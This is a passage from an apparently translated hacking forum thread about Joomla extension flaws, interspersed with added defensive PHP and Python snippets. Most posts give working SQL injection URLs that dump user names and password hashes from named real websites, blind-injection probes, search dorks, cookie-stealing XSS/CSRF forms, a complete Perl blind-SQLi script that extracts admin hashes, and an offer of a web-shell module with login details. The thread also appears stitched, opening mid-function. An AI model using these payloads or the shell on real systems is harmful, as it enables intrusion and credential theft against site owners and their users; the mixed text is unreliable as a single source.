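            hits.append({'ip': match.group('ip'), 'status': int(match.group('status')),
                         'path': match.group('path'), 'labels': sorted(labels)})
    return hits


# Constructed sample log (RFC 5737 addresses); the request shapes mirror those quoted
# in this thread, with placeholder values in place of real sites.
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Nov/2009:00:10:01 +0300] "GET /index.php?option=com_content&view=article&id=12&Itemid=3 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [09/Nov/2009:00:10:02 +0300] "GET /index.php?option=com_dictionary&Itemid=125&wordid=-3+union+select+1,username,password+from+jos_users HTTP/1.1" 200 7310 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [09/Nov/2009:00:10:03 +0300] "GET /index.php?option=com_ci&task=viewCi&sector_id=77+and+substring(version(),1,1)=5&m=m HTTP/1.1" 200 6402 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [09/Nov/2009:00:10:04 +0300] "GET /administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=../../../../../../../etc/passwd%00 HTTP/1.1" 500 311 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [09/Nov/2009:00:10:05 +0300] "GET /components/com_aclassf/gmap.php?addr=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2201 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [09/Nov/2009:00:10:06 +0300] "GET /index.php?option=com_jshopping&task=product&product_id[]=27&category_id=8&Itemid=7 HTTP/1.1" 200 4807 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit['ip'], hit['status'], ','.join(hit['labels']), hit['path'])
```

The decoding step matters more than the pattern list: the thread's payloads arrive with + for spaces, /**/ for spaces, and percent-encoded brackets, so matching on the raw request line misses most of them. The classifier reads parameter names as well as values, which is what separates the clickheat-style include probes (a config-path parameter carrying ../ or a URL) from an ordinary send2friend= parameter that legitimately contains a URL.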
HAXTA4OK
09.11.2009, 00:10
Path disclosure
Component : jevents
index.php?option=com_jevents&task=icalrepeat.detail&evid[]=33&Itemid=0&year=2009&month=11&day=03&uid=d3e68405af27abcc1522182b0970abc0
__http://www.ccebc.com/index.php?option=com_jevents&task=icalrepeat.detail&evid[]=100&Itemid=0&year=2009&month=11&day=11&uid=455d8ad5611ba60fdf1eaab2215e324c&lang=us
no sources, just stumbled on it
HAXTA4OK
09.11.2009, 00:24
Vulnerability : SQL
Component : com_rsgallery2
Version : N/A
index.php?option=com_rsgallery2&Itemid=1&page=inline&id=9&catid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--&limitstart=1
__http://etherealangels.com/index.php?option=com_rsgallery2&Itemid=1&page=inline&id=9&catid=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,12, 13--&limitstart=1
__http://etherealangels.com/index.php?option=com_rsgallery2&Itemid=1&page=inline&id=9&catid=-1+union+select+1,2,3,4,concat_ws(0x3a,username,pas sword),6,7,8,9,10,11,12,13+from+jos_users--&limitstart=1
lots of logins and passwords
PS I don't think I've seen this anywhere
HAXTA4OK
09.11.2009, 10:16
Path disclosure
Component : com_jshopping
index.php?option=com_jshopping&task=product&product_id[]=27&category_id=8&Itemid=7
index.php?option=com_jshopping&task=product&product_id=27&category_id[]=8&Itemid=7
__http://www.fitofilter.com/index.php?option=com_jshopping&task=product&product_id[]=27&category_id=8&Itemid=7
__http://polimobil.md/index.php?option=com_jshopping&task=product&product_id=18&category_id[]=11&Itemid=69
HAXTA4OK
09.11.2009, 11:45
Vulnerability: Blind SQL
Component: com_ci
index.php?option=com_ci&task=viewCi&sector_id=77+and+substring(version(),1,1)=4&m=m&Itemid=1210&send2friend=index.php%3Foption%3Dcom_ci%26task%3DviewCi%26sector_id%3D77%26m%3Dm%26Itemid%3D1210
false: _http://www.hkz.nl/index.php?option=com_ci&task=viewCi&sector_id=77+and+substring(version(),1,1)=4&m=m&Itemid=1210&send2friend=index.php%3Foption%3Dcom_ci%26task%3DviewCi%26sector_id%3D77%26m%3Dm%26Itemid%3D1210
True: _http://www.hkz.nl/index.php?option=com_ci&task=viewCi&sector_id=77+and+substring(version(),1,1)=5&m=m&Itemid=1210&send2friend=index.php%3Foption%3Dcom_ci%26task%3DviewCi%26sector_id%3D77%26m%3Dm%26Itemid%3D1210
HAXTA4OK
09.11.2009, 17:11
Vulnerability: Blind SQL
Component: com_acprojects
true : _http://www.artcom.de/index.php?lang=en&option=com_acprojects&id=17+and+substring(version(),1,1)=4&Itemid=115&page=6
False : _http://www.artcom.de/index.php?lang=en&option=com_acprojects&id=17+and+substring(version(),1,1)=5&Itemid=115&page=6
Component: com_acnews
_http://www.artcom.de/index.php?option=com_acnews&task=view&id=449+and+substring(version(),1,1)=4--&Itemid=136&page=0&lang=en
SQL
Component: com_acjobs
_http://www.artcom.de/index.php?option=com_acjobs&Itemid=-120+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17--&lang=en
Output lands in the title.
P.S. On one more site the SQLi doesn't work =\ maybe a different version))
component: com_kunena
versions: downloaded the last two (Kunena1.5.6, Kunena1.5.5)
file: default/plugin/userlist/userlist.php
...
$orderby = JRequest::getVar('orderby', 'registerDate');
$direction = JRequest::getVar('direction', 'ASC');
$search = JRequest::getVar('search', '');
... // more variables & building the 1st $query
if ($search != "") {
$query .= " WHERE (u.name LIKE '%$search%' OR u.username LIKE '%$search%')";
}
$kunena_db->setQuery($query);
$total = $kunena_db->loadResult();
... // defining the 2nd $query
if ($search != "")
{
$query .= " WHERE (name LIKE '%$search%' OR username LIKE '%$search%')";
$query_ext .= "&search=" . $search;
}
$query .= " ORDER BY $orderby $direction, id $direction";
... // +limit
$kunena_db->setQuery($query);
...
Description of getVar() from the JRequest class is here (http://api.joomla.org/Joomla-Framework/Environment/JRequest.html#getVar)
Fix:
$search=addslashes(JRequest::getVar('search',''));
use a switch for $orderby & $direction
Exploitation:
?search='){inj} // magic_quotes_gpc off
?orderby={inj}
?direction=,{inj}
I didn't find it myself; it's from http://joomla-support.ru/showthread.php?p=75180#post75180, actually.
Hi all.
Found a bug in sh404SEF: poor filtering of parameter values.
version: 1.0.20_Beta - build_237
In the admin panel, when saving the component settings. I caught it on the Insert before page title parameter.
If you set a value like, for example:
\"; echo 'test'; "Формос ТК официальный дистрибъютор 3М. then consequently you can execute any function in Joomla and in PHP, for example output a value from configuration.php and so on, or delete files and so on.
Anyway, that's the deal. Be careful!
nemaniak
05.12.2009, 12:22
Joomla Joaktree Component v1.0 SQL Injection Vulnerability
Author: Don Tukulesto
Published: 2009-12-01
http://extensions.joomla.org/extensions/miscellaneous/genealogy/9842
Version() : 1.0
Vulnerability : SQL injection
http://server/index.php?option=com_joaktree&view=joaktree&treeId=[SQL]
[ Exploit ]
-1+union+select+1,1,1,version(),1,666,1,concat(user name,0x3a,password),1,1,1,1,1,1,1,1+from+jos_users--
Strilo4ka
07.12.2009, 16:33
Maybe it'll come in handy for someone: the latest Joomla version, Joomla_1.5.15-Stable-Full_Package.zip
Tested on my own box:
http://localhost/lastjoom/index.php?limitstart=-5
our path:
Warning: Invalid argument supplied for foreach() in Z:\home\localhost\www\lastjoom\components\com_content\models\frontpage.php on line 104
Nightmarе
13.12.2009, 22:01
Today's exploit:
http://www.exploit-db.com/exploits/10407
From the author SOA Crew
The only thing I don't get is where it outputs the data; nothing is visible on the front page ;(
Root-access
06.01.2010, 15:59
A useless bug in Joomla, or a "logical SQL injection"
Let's look at the script \joomla\administrator\components\com_users\views\users\view.html.php.
It contains this section:
$query = 'SELECT a.*, g.name AS groupname'
. ' FROM #__users AS a'
. ' INNER JOIN #__core_acl_aro AS aro ON aro.value = a.id'
. ' INNER JOIN #__core_acl_groups_aro_map AS gm ON gm.aro_id = aro.id'
. ' INNER JOIN #__core_acl_aro_groups AS g ON g.id = gm.group_id'
. $filter
. $where
. ' GROUP BY a.id'
. $orderby
;
The variable $orderby is defined above:
$orderby = ' ORDER BY '. $filter_order .' '. $filter_order_Dir;
And the variables $filter_order and $filter_order_Dir are set by the user.
In the admin panel, every section has hidden form fields carrying these variables.
So, let's substitute bogus values, for example asd and fgh respectively: http://localhost/joomla/administrator/index.php?option=com_content&filter_order=asd&filter_order_Dir=fgh
We get the following response:
500 - An error has occurred!
DB function failed with error number 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'fgh, section_name, cc.title, c.ordering LIMIT 0, 20' at line 1 SQL=SELECT c.*, g.name AS groupname, cc.title AS name, u.name AS editor, f.content_id AS frontpage, s.title AS section_name, v.name AS author FROM jos_content AS c LEFT JOIN jos_categories AS cc ON cc.id = c.catid LEFT JOIN jos_sections AS s ON s.id = c.sectionid LEFT JOIN jos_groups AS g ON g.id = c.access LEFT JOIN jos_users AS u ON u.id = c.checked_out LEFT JOIN jos_users AS v ON v.id = c.created_by LEFT JOIN jos_content_frontpage AS f ON f.content_id = c.id WHERE c.state != -2 ORDER BY asd fgh, section_name, cc.title, c.ordering LIMIT 0, 20
As we can see, our values made it into the SQL query. But they are still filtered: most special characters are not let through; dots, for example, are allowed, since they are needed in a normal query.
It would seem that nothing but the table prefix can be squeezed out of such an "SQL injection".
However, browsing the admin panel we find the user management page: http://localhost/joomla/administrator/index.php?option=com_users
In this section the parameters mentioned above are used to sort users (they are substituted into ORDER BY).
And then, suddenly: what if we sort them by password?
Well: http://localhost/joomla/administrator/index.php?option=com_users&filter_order=a.password
Now we can create a user, give him some password, then sort on this page, and we will see where the admin's hash sits alphabetically: above or below our user's hash.
From there a binary search can be organised to pull out the whole admin hash.
The end.
P.S. Of course, this bug in Joomla gives nothing at all, since it is in the admin panel and there is no XSRF there. I wrote about it only to show that such attacks are possible in principle. A situation like this can arise, for example, in a forum engine, where the user list may be accessible to everyone. Moral: variables must not only be filtered for special characters, the entered data must also be checked for logical consistency.
P.P.S. In vBulletin, for example, the memberlist.php script restricts the sorting parameters:
switch ($sortfield)
{
case 'username':
$sqlsort = 'user.username';
break;
case 'joindate':
$sqlsort = 'user.joindate';
break;
case 'posts':
$sqlsort = 'user.posts';
break;
case 'lastvisit':
$sqlsort = 'lastvisittime';
break;
case 'reputation':
$sqlsort = iif($show['reputationcol'], 'reputationscore', 'user.username');
$secondarysortsql = ', user.username';
break;
case 'age':
if ($show['agecol'])
{
$sqlsort = 'agesort';
$secondarysortsql = ', user.username';
}
else
{
$sqlsort = 'user.username';
}
break;
default:
$sqlsort = 'user.username';
$sortfield = 'username';
}
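The fix that both the Kunena post earlier in the thread and the vBulletin switch above point at is an allow-list for the sort column and direction, with the search term quoted by the database driver rather than concatenated. The script below is an added example, not Kunena's, Joomla's or vBulletin's code; the table, the column names and the offline stand-in quoter are assumptions. It also drops array-valued parameters, which is the trick behind the path-disclosure posts (evid[]=33, product_id[]=27) earlier in the thread, and it leaves the password column out of the allow-list, so the "sort by hash" request falls back to the default order instead of reaching ORDER BY.

```php
<?php
// Added example; not Kunena's, Joomla's or vBulletin's code.
// Table and column names are assumed for illustration.

// Sort keys a visitor may request, mapped to the real column expression.
// password, email and similar columns are deliberately absent, so a request
// to sort by the hash falls back to the default instead of reaching ORDER BY.
const SORT_COLUMNS = [
    'registerDate' => 'u.registerDate',
    'username'     => 'u.username',
    'name'         => 'u.name',
];
const DEFAULT_SORT = 'registerDate';

function strParam($value, string $default): string
{
    // Arrays (the "evid[]=33" trick) and other non-scalars fall back to the default.
    return is_scalar($value) ? (string) $value : $default;
}

function intParam($value, int $default): int
{
    return is_scalar($value) ? (int) $value : $default;
}

function sortColumn(string $requested): string
{
    return SORT_COLUMNS[$requested] ?? SORT_COLUMNS[DEFAULT_SORT];
}

function sortDirection(string $requested): string
{
    return strtoupper($requested) === 'DESC' ? 'DESC' : 'ASC';
}

// Escape LIKE metacharacters so the search term matches literally;
// the whole pattern is still quoted by the driver afterwards.
function escapeLike(string $s): string
{
    return str_replace(['\\', '%', '_'], ['\\\\', '\\%', '\\_'], $s);
}

/**
 * Build the user-list query from raw request input.
 * $quote must return a fully quoted SQL string literal: in Joomla pass
 * [$db, 'quote']; with mysqli, wrap real_escape_string() in quotes.
 */
function buildUserListQuery(array $input, callable $quote): string
{
    $search    = trim(strParam($input['search'] ?? '', ''));
    $orderby   = sortColumn(strParam($input['orderby'] ?? DEFAULT_SORT, DEFAULT_SORT));
    $direction = sortDirection(strParam($input['direction'] ?? 'ASC', 'ASC'));
    $limit     = max(1, min(100, intParam($input['limit'] ?? 20, 20)));
    $offset    = max(0, intParam($input['limitstart'] ?? 0, 0));

    $sql = 'SELECT u.id, u.username, u.name, u.registerDate FROM #__users AS u';
    if ($search !== '') {
        $pattern = $quote('%' . escapeLike($search) . '%');
        $sql .= " WHERE (u.name LIKE $pattern OR u.username LIKE $pattern)";
    }
    // Every token after ORDER BY is a fixed string chosen above, never request text.
    return $sql . " ORDER BY $orderby $direction, u.id $direction LIMIT $offset, $limit";
}

// Stand-in quoter so the script runs offline (constructed; use the driver's quoting in real code).
$quote = fn(string $s): string => "'" . str_replace(['\\', "'"], ['\\\\', "\\'"], $s) . "'";

// Constructed inputs mirroring the thread's payloads; each one ends up inert.
$attempts = [
    ['search'    => "'){inj}"],              // Kunena: quote inside LIKE
    ['orderby'   => 'password'],             // "logical" injection: unknown key, default sort used
    ['direction' => ',(select 1)'],          // Kunena: injection through direction
    ['limit'     => ['5']],                  // array where an int is expected
    ['orderby'   => 'username', 'direction' => 'desc', 'search' => '50%_off'],
];
foreach ($attempts as $input) {
    echo buildUserListQuery($input, $quote), "\n";
}
```

Run it with the PHP CLI and compare the five printed statements: the quote and the comma never appear unquoted, the password column never appears at all, and the array becomes the default limit. The map from request key to column expression is the important part: it is the same idea as the vBulletin switch, but it also decides which columns are allowed to influence ordering, which is what the "logical" injection above exploits.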
shell_c0de
07.01.2010, 13:17
Might be useful to someone; I myself have run into problems many times uploading a shell from the admin panel because of broken privileges,
so I made a simple module, mod_joomla_c99shell
1) Go to "Extension Manager", choose "Upload Package File", upload our file mod_joomla_c99shell.zip
2) After a successful install go to the folder http://site.ru/modules/mod_joomla_c99shell/mod_joomla_c99shell.php
3) Log in to our shell with login fixer, password antichat (afterwards you can change everything there as you see fit)
You can download the shell module here (http://fixer.whitehat.ru/mod_joomla_c99shell.zip); tested on Joomla 1.5.14
A constantly updated list of vulnerable plugins.
http://docs.joomla.org/Vulnerable_Extensions_List
HAXTA4OK
09.01.2010, 16:11
File: com_oscommerce
Vulnerability: LFI
Sorry, never did find the source code
Special phase of the moon: Magic_quotes = off
https://www.naadac.org/index.php?option=com_oscommerce&osMod=product_info'
Warning: include(components/com_oscommerce/product_info\'.php) [function.include]: failed to open stream: No such file or directory in /www/naadac.org/html/components/com_oscommerce/oscommerce.php(2) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 68
Dork: inurl:index.php?option=com_oscommerce
Um, I don't think this is old news; if it is, delete it..
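The warning quoted in the post shows two separate problems: the request parameter is concatenated straight into the include path, and the failed include echoes the server's absolute path to the visitor. The script below is an added example, not com_oscommerce code, of how a page parameter can select a file without ever becoming part of the path; the page names and directory are assumptions.

```php
<?php
// Added example, not com_oscommerce's code: selecting an include file from a
// request parameter without letting the parameter supply the path.
// Page names and the directory are assumed.

ini_set('display_errors', '0');  // a failed include must not echo the server path
ini_set('log_errors', '1');      // keep the detail in the error log instead

const PAGE_DIR = __DIR__ . '/pages';
const PAGES    = ['index', 'product_info', 'contact_us'];

// Return the file to include, or null. The request value is only used as a
// key to look up in a fixed list; it is never concatenated into the path.
function resolvePage($requested): ?string
{
    if (!is_string($requested) || !in_array($requested, PAGES, true)) {
        return null;
    }
    return PAGE_DIR . '/' . $requested . '.php';
}

function dispatch($requested): string
{
    $file = resolvePage($requested);
    if ($file === null) {
        http_response_code(404);
        return 'Unknown page';  // no echo of the requested value, no path in the response
    }
    ob_start();
    include $file;
    return (string) ob_get_clean();
}

// Constructed inputs: a valid page, the quote probe from the post, a traversal attempt, an array.
$probes = ['product_info', "product_info'", '../../configuration', ['x']];
foreach ($probes as $p) {
    printf("%-24s -> %s\n", is_string($p) ? $p : 'array', resolvePage($p) ?? 'rejected');
}
```

Only the first probe resolves; the other three are rejected before any filesystem call, so there is no error message to leak a path even if display_errors were left on. dispatch() is included to show where the resolved path is consumed; the demo loop only exercises resolvePage() so the script runs without a pages directory.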
Root-access
11.01.2010, 01:09
Joomla XSS
The XSS is present in the com_admin component.
Vulnerable line in \joomla\administrator\components\com_admin\admin.admin.html.php:
<input type="text" name="helpsearch" value="<?php echo $helpsearch;?>" class="inputbox" />
Go to http://localhost/joomla/administrator/index.php?option=com_admin&task=help.
There is a search field there. The text from it is not passed through htmlspecialchars, but there is some strange filtering.
For some reason, if you type, say, this: "><img src="blabla....., that tag gets cut out, i.e. I couldn't manage to write a new tag.
So we have to make do with the attributes of the <input> tag.
The XSS is in a POST parameter of the admin panel, so it wouldn't work without XSRF.
So, the exploit:
<html>
<body>
<form action="http://localhost/joomla/administrator/index.php?option=com_admin&task=help" method="post" name="adminForm">
<input class="text_area" type="hidden" name="option" value="com_admin" />
<input type="text" name="helpsearch" value='" size="1000" onmouseover="alert()' class="inputbox" />
<input type="submit" value="Go" class="button" id="xsrf"/>
<input type="hidden" name="task" value="help" />
</form>
<script>document.getElementById("xsrf").click();</script>
</body>
</html>
The point: I made the search field long, so that if the admin moves the mouse across the screen, the XSS fires. The probability of that is quite high.
Vulnerability: SQL-Inj
Component: com_ezautos (tested on v3.2.0)
Dork: inurl:com_ezautos inurl: option
File: /components/com_ezautos/ezautos.php
switch ($task){
case 'helpers':
helpers($_REQUEST['id']);
break;
}
.......
function helpers($id){
global $database, $mainframe;
switch ($id) {
case '1':
if(isset($_GET['firstCode'])){
$query = "SELECT * FROM #__ezautos_model WHERE published='1' AND makeid=".$_GET['firstCode']." ORDER BY model DESC";
$database->setQuery( $query );
$rows = $database->loadObjectList();
echo "obj.options[obj.options.length] = new Option('Select Model','0');\n";
foreach ($rows as $row){
echo "obj.options[obj.options.length] = new Option('".$row->model."','".$row->moid."');\n";
}
}
break;
}
}
http://www.sfauto.ru/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1+and+0+union+select+1,2,concat(username ,0x3a,password),4,5,6,7+from+%23__users+where+gid= 25+or+gid=24+and+block<>1--
SQL Injection in standard components
1) Joomla Component com_wrapper
+================================================= ==================================+
./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _
/ /_ _ _ _ / _ _\/ _ _ /\ \< |/_ _ _ _ /
\ \_ _ _ _/ /___ / / __ | |) / | | / /
\_ _ _ _/ /___ / / | __ || / | | / /
_______\ \_ _ \ \2_0_0_9 | \ | | / /____
/_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+================================================= ==================================+
[?] ~ Note : sEc-r1z CrEw# r0x !
================================================== ============================
[?] Joomla Component com_wrapper SQL Blind Injection Vulnerability
================================================== ============================
[?] My home: [ http://sec-r1z.com ]
[?] Script: [ Joomla Component com_wrapper ]
[?] Language: [ PHP ]
[?] Founder: [ ./Red-D3v1L ]
[?] Gr44tz to: [ sec-r1z# Crew - Hackteach Team - My L0ve ~A~ ]
[?] Fuck To : [ Zombie_KsA << big big big L4m3r ]
################################################## ######################
===[ Exploit SQL ]===
[»]SQL : [Path]/index.php?option=com_wrapper&view=wrapper&Itemid==[inj3ct C0dE]
[»]dem0:
This True :
http://www.doubleclick.ps/index.php?option=com_wrapper&view=wrapper&Itemid=92%20and%201=0
This False :
http://www.doubleclick.ps/index.php?option=com_wrapper&view=wrapper&Itemid=92%20and%201=1
================================================== ============================
#sEc-r1z.com Str1kEz y0u !
2) com_weblinks
################################################## ###############
# Securitylab.ir
################################################## ###############
# Application Info:
# Name: Joomla Component com_weblinks
################################################## ###############
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
################################################## ###############
Vulnerability:
http://site.com/index.php?option=com_weblinks&task=view&catid=8&id=-1 UNION SELECT 1,2,3,4,5
################################################## ###############
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
################################################## #################
3) com_xmap
################################################## ###############
# Securitylab.ir
################################################## ###############
# Application Info:
# Name: Joomla Component com_xmap
################################################## ###############
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
################################################## ###############
Vulnerability:
http://site.com/index.php?option=com_xmap&sitemap=2&Itemid=18-1 UNION SELECT 1,2,3,version(),5,6,7,8--
################################################## ###############
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.securitylab.ir
Root-access
08.04.2010, 14:43
Joomla XSS
An XSS similar to the one in post #103, but more convenient:
http://localhost/administrator/index.php?option=com_content&search=%22%20size=100%20onmouseover=alert()%20bla
No CSRF or POST needed
Comrades, can anyone tell me how to find out the full Joomla version? The configuration.php-dist option won't work.
The version can be seen in the file /includes/version.php
Blind SQL Injection joomla component com_mytube (user_id)
#!/usr/bin/perl -w
#---------------------------------------------------------------------------------
#joomla component com_mytube (user_id) Blind SQL Injection Vulnerability
#---------------------------------------------------------------------------------
#Author : Chip D3 Bi0s
#Group : LatiHackTeam
#Email : chipdebios[alt+64]gmail.com
#Date : 15 September 2009
#Critical Lvl : Moderate
#Impact : Exposure of sensitive information
#Where : From Remote
#---------------------------------------------------------------------------
#Affected software description:
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#Application : MyRemote Video Gallery
#version : 1.0 Beta
#Developer : Jomtube Team
#License : GPL type : Non-Commercial
#Date Added : Aug 24, 2009
#Download : http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip
#Description :
#MyRemote Video Gallery is the most Powerful Video Extension made for Joomla 1.5x
#which will allow you to transform your Website into a professional looking Video
#Gallery with functionality that is similar to YouTube.com. MyRemote Video Gallery
#is an open source (GNU GPL) video sharing Joomla extension has been created
#specifically for the Joomla 1.5x (MVC) Framework and can not be used without Joomla.
#MyRemote Video Gallery gives you the option to Embed Videos from Youtube and offers
#the Framework so you can create your own Remote Plugins for other Remote Servers like
#Dailymotion, Google Video, Vimeo, Blip.tv, Clipser, Revver, a which will allow you to
#run your site for low cost since all the bandwidth usage and hard drive space is located
#on the video server sites. So if you already have a large library of Videos on some
#Remote Sites like Youtube.com you can build the Video Part of your Site Very Quickly.
#---------------------------------------------------------------------------
#I.Blind SQL injection (user_id)
#Poc/Exploit:
#~~~~~~~~~~~
#http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=null
#X: Valid User_id
#+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
#+++++++++++++++++++++++++++++++++++++++
use LWP::UserAgent;
use Benchmark;
my $t1 = new Benchmark;
system ('cls');
print "\n\n";
print "\t\t[+] ---------------------------------[+]\n";
print "\t\t| | Chip d3 Bi0s | |\n";
print "\t\t| MyRemote Video Gallery Bsql | \n";
print "\t\t|joomla component com_mytube (user_id)| \n";
print "\t\t[+]----------------------------------[+]\n\n";
print "http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=62:\n";chomp(my $target=<STDIN>);
$w="Total Videos In Category";
$column_name="concat(password)";
$table_name="jos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
print "----------------Inyectando----------------\n";
$host = $target . "+and+1=1&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
if ($content =~ /$regexp/) {
$host = $target . "+and+1=2&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
if ($content =~ /$regexp/) {print " [-] Exploit Fallo :(\n";}
else
{print " [-] Vulnerable :)\n";
$d=0;
for ($idusuario=62;$idusuario<=80;$idusuario++)
{
$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$idusuario."+limit+0,1),1,1))>0&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;
if ($content =~ /$regexp/) {$idusu[$d]=$idusuario;$d=$d+1}
}
print " [+] Usuario existentes : "." ".join(',', @idusu) . "\n";
print " [-] # Usuario que desea extraer : ";chomp($iduss=<STDIN>);
for ($x=1;$x<=32;$x++)
{
$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))>57&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;}
if ($content =~ /$regexp/)
{
for ($c=97;$c<=102;$c++)
{
$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;
if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;}
}
}
else
{
for ($c=48;$c<=57;$c++)
{
$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;
if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;}
}
}
}
print " [+] Password :"." ".join('', @caracter) . "\n";
my $t2 = new Benchmark;
my $tt = timediff($t2, $t1);
print "El script tomo:",timestr($tt),"\n";
}
}
else
{print " [-] Exploit Fallo :(\n";}
milw0rm.com [2009-09-21]
XSS vulnerability in JComments
Vulnerable versions: 2.1.0.0 [07/08/2009] and possibly earlier
JoomlaTune.com notified: 4 May 2010
Vulnerability type: XSS
Status: fixed by JoomlaTune.com
Severity: Medium
Vulnerability details: a user can execute arbitrary JS code in the vulnerable application. The vulnerability arises from incorrect user identification in "admin.jcomments.php". A successful attack using this vulnerability may lead to loss of confidential data and theft of identity information in the form of cookies.
An attacker can use a browser to carry out the attack:
<form method="POST" action="http://joomla/administrator/index.php" name="main">
<input type="hidden" name="name" value='ComntrName"><script>alert(document.cookie)</script>'>
<input type="hidden" name="email" value="example@example.com">
<input type="hidden" name="comment" value="comment text">
<input type="hidden" name="published" value="1">
<input type="hidden" name="option" value="com_jcomments">
<input type="hidden" name="id" value="1">
<input type="hidden" name="task" value="save">
</form>
<script>
document.main.submit();
</script>
Fix: upgrade to a later version
(c)http://securityvulns.ru/Xdocument887.html
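The three XSS reports above (the com_admin helpsearch field, the com_content search parameter, and the JComments name field) share one root cause: a request value is written into an HTML attribute without attribute-context encoding. Tag filtering, which the first post noticed, does not help, because the payload only needs a double quote to leave the attribute. The script below is an added example, not Joomla's or JComments' code: it renders the input line quoted from admin.admin.html.php with and without htmlspecialchars(), then parses the result the way a browser would and lists any script element or on* attribute that actually came into existence. The ENT_QUOTES choice is the point: the single-quoted variant of the same line would otherwise stay open.

```php
<?php
// Added example; not Joomla's or JComments' code. The <input> line is the one
// quoted from admin.admin.html.php; everything else here is constructed.

function renderUnsafe(string $helpsearch): string
{
    // The quoted vulnerable line: value written straight into the attribute.
    return '<input type="text" name="helpsearch" value="' . $helpsearch . '" class="inputbox" />';
}

function renderSafe(string $helpsearch): string
{
    // Attribute context: encode & < > " and ' so no value can leave the quotes.
    $encoded = htmlspecialchars($helpsearch, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="helpsearch" value="' . $encoded . '" class="inputbox" />';
}

// Parse the rendered markup as a browser would and report anything that
// became executable: a script element, or an on* attribute on any element.
function injectedMarkup(string $html): array
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    $found = [];
    foreach ($doc->getElementsByTagName('*') as $el) {
        if (strtolower($el->nodeName) === 'script') {
            $found[] = 'script';
        }
        foreach ($el->attributes as $attr) {
            if (stripos($attr->name, 'on') === 0) {
                $found[] = $el->nodeName . '@' . $attr->name;
            }
        }
    }
    return $found;
}

// Constructed inputs taken from the posts above (the GET one URL-decoded).
$payloads = [
    '" size="1000" onmouseover="alert()',                      // com_admin POST field
    rawurldecode('%22%20size=100%20onmouseover=alert()%20bla'), // com_content GET parameter
    'ComntrName"><script>alert(document.cookie)</script>',      // JComments stored name
];
foreach ($payloads as $p) {
    $unsafe = renderUnsafe($p);
    $safe   = renderSafe($p);
    printf("unsafe [%s] %s\n", implode(',', injectedMarkup($unsafe)) ?: 'clean', $unsafe);
    printf("safe   [%s] %s\n", implode(',', injectedMarkup($safe)) ?: 'clean', $safe);
}
```

The unsafe lines report input@onmouseover for the first two payloads and script for the third; the safe lines report clean for all three, and the encoded value survives as a literal search string the user can still see and edit. Note that the long size attribute trick in the first post is not a separate weakness: once the attribute cannot be closed, the size value is just text too.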
.:[melkiy]:.
14.06.2010, 20:12
com_elite_experts
Couldn't find the source code
Expl:
index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=-38+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38+--+
Example:
